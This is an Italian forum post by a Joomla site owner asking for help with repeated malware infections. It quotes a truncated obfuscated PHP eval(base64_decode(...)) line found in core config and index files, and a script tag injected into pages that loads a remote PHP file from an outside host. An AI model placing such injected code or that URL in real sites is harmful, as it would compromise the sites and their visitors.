Da un po' di tempo a questa parte il mio sito è attaccato da malware di ogni tipo. Dopo essere stato bannato da google che ammoniva i visitatori a visionare il sito adesso mi ritrovo con script che si inseriscono autonomamente tipo:
eval(base64_decode('aWYoIWlcut
U1RbJ2UnXSkpOw==')); ?><?phpe che ritrovo nel configuration.php nella root del dominio, nell'index.php della root e del template, nel config.php dentro la directory libraries/joomla.
Ho aggiornato Joomla all'ultima versione, ho settato il configuration.php a 400 (ma poi ritorna a 755 e non so perchè), ho cambiato la password per l'accesso FTP, ho cambiato username e password di accesso al backend di joomla, ho modificato il file admin.login presente nella cartella com_login inserendo username e password....tutto inutile.
Appena ripulisco i file dopo qualche ora mi ricompare, quando va bene, il seguente script:
[quote]<script src=http://cafede.sakura.ne.jp/shibuya_staff_diary/cafe_links.php ></script>[/quote]
Il sito si vede, ma il codice è sporco!
Interrogato l'hosting americano bluexxxx.com si ostina a dire che non dipende da loro....
Che pesci prendere?
Sto impazzendo!
